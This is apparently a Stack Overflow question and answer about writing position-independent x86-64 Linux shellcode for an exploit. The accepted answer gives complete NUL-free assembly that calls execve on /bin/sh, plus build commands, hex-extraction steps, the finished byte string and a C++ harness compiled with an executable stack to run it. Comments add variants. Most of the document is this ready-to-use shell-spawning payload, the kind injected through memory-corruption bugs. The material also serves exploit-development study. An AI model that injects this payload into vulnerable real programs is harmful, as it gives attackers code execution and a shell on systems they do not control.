# Pointer to string in stand-alone binary code without .data section

Tags: assembly, x86-64, nasm, shellcode, execve

I'm trying to write kind of exploit and have a problem with making my asm code run anywhere on the stack. Here's it:

```
BITS 64

global _start
_start:

  mov rax, 59

  jmp short file
  c1:
  pop rdi

  jmp short argv
  c2:
  pop rsi

  mov rdx, 0

  syscall
  ret

file:

  call c1
  db '/bin/sh',0

argv:

  call c2
  dq arg, 0  <- problem

arg:

  db 'sh',0
```

This code won't work anywhere on the stack due to selected line because this code can be executed anywhere on the stack so nasm can't correctly compute arg's address.  (This is a followup to [shellcode calls different syscall while runing alone as individiual code and while running with C++ code](https://stackoverflow.com/questions/57285839/shellcode-calls-different-syscall-while-runing-alone-as-individiual-code-and-whi) where that was the problem.)

I've easily replaced strings with jmp/call/pop trick but still have a problem with pointer to string.

Comment: In 64 bit mode you don't need call/pop trick you have rip relative lea.

Answer (score 5, accepted):

In 64-bit code you don't need the JMP/CALL/POP method since you have the ability to use RIP relative addressing. Your code also inserts unwanted NUL bytes in the string with instructions like `mov rdx, 0`. For shellcode that will be inserted as strings you need to use a set of instructions that doesn't introduce a NUL as that can prematurely end the string depending on how it is injected into exploitable program.

[`execve`](http://man7.org/linux/man-pages/man2/execve.2.html) is defined as:

> execve - execute program
>
> ```
> int execve(const char *pathname, char *const argv[],
>            char *const envp[]);
> ```
>
> *argv* is an array of argument strings passed to the new program.  By
>          convention, the first of these strings (i.e., argv[0]) should contain
>          the filename associated with the file being executed.  *envp* is an
>          array of strings, conventionally of the form key=value, which are
>          passed as environment to the new program.  The argv and envp arrays
>          must each include a null pointer at the end of the array.

If not using *envp* you can pass a NULL. *argv* needs to be a NULL terminated **list** of pointers to strings. In your case you are trying to generate the equivalent of the *C* code:

```
#include <unistd.h>
int main()
{
    char pathname[] = "/bin/sh";
    char *argv[] = { pathname, NULL };
    execve (pathname, argv, NULL);
    return 0;
}
```

You can do this entirely on the stack in assembly code that can be run as a shellcode. The following code builds the `/bin/sh` string on the stack and points *RDI* (pathname) to it. It then builds the NULL terminated *argv* list by pushing a NULL on the stack and the value in RDI is pushed. *RSI* is then set to the *argv* list on the stack. *RDX* is zeroed so the *envp* list is NULL. The `execve` (syscall 59) is then invoked. I create a `shellcode.asm` assembly file with:

```
BITS 64

global _start
_start:
    ; Build pathname on the stack
    sub rsp, 8                ; Allocate space for the pathname on the stack
    mov rdi, rsp              ; Set RDI to the space that will hold the pathname
    mov dword [rsp], '/bin'   ; Move the first 4 characters of the path into pathname
    mov dword [rsp+4], '/sh.' ; Move the last 4 characters of the path into pathname
                              ;     The '.' character will be replaced with a NUL byte
    xor eax, eax              ; Zero RAX
    mov [rsp+7], al           ; Terminate pathname by replacing the period with 0

    ; Build NULL terminated argv list on the stack
    push rax                  ; NULL terminator
    push rdi                  ; Pointer to pathname
    mov rsi, rsp              ; Point RSI to the argv array

    xor edx, edx              ; RDX = NULL(0) (we don't have an envp list)
    mov al, 59                ; 59 = execve system call number
    syscall                   ; Do the execve system call
```

Build it into a binary executable with:

```
nasm -f elf64 shellcode.asm -o shellcode.o
gcc -nostartfiles shellcode.o -o shellcode
```

Running `./shellcode` should produce a Linux shell prompt. Next convert the standalone executable to a shell string binary called `shellcode.bin` and then convert it to a HEX string with HEXDUMP:

```
objcopy -j.text -O binary shellcode shellcode.bin
hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin
```

The output from the HEXDUMP should be:

> \x48\x83\xec\x08\x48\x89\xe7\xc7\x04\x24\x2f\x62\x69\x6e\xc7\x44\x24\x04\x2f\x73\x68\x2e\x31\xc0\x88\x44\x24\x07\x50\x57\x48\x89\xe6\x31\xd2\xb0\x3b\x0f\x05

**Note:** There are no NUL (`\x00`) in the output.

Insert the string into your exploitable C++ program call `exploit.cpp`:

```
int main(void)
{
    char shellstr[]="\x48\x83\xec\x08\x48\x89\xe7\xc7\x04\x24\x2f\x62\x69\x6e\xc7\x44\x24\x04\x2f\x73\x68\x2e\x31\xc0\x88\x44\x24\x07\x50\x57\x48\x89\xe6\x31\xd2\xb0\x3b\x0f\x05";
    reinterpret_cast<void(*)()>(shellstr)();

    return 0;
}
```

Compile it to the program `exploit` with an executable stack:

```
g++ -Wl,-z,execstack exploit.cpp -o exploit
```

When run with `./exploit` it should present a Linux shell prompt. `strace ./exploit` should output this for the `execve` system call:

> execve("/bin/sh", ["/bin/sh"], NULL)    = 0

Comment: With an `lea rcx, [rdi+6]` / `push rcx` you could construct `argv = { "sh", 0 };` instead of `{ "/bin/sh", 0 }` to exactly match what the OP asked for.  Or for an arbitrary first arg not overlapping the executable pathname, like `push 'shsh'` / `lea rcx, [rsp+2]` to get a pointer into that 0-terminated string that `push imm32` creates.  But reusing the executable path is a good idea.

Comment: Instead of a byte-store of `0`, it's also possible to just `push rax` for zero and then `push '/bin'` ; `mov [rsp+4], //sh`.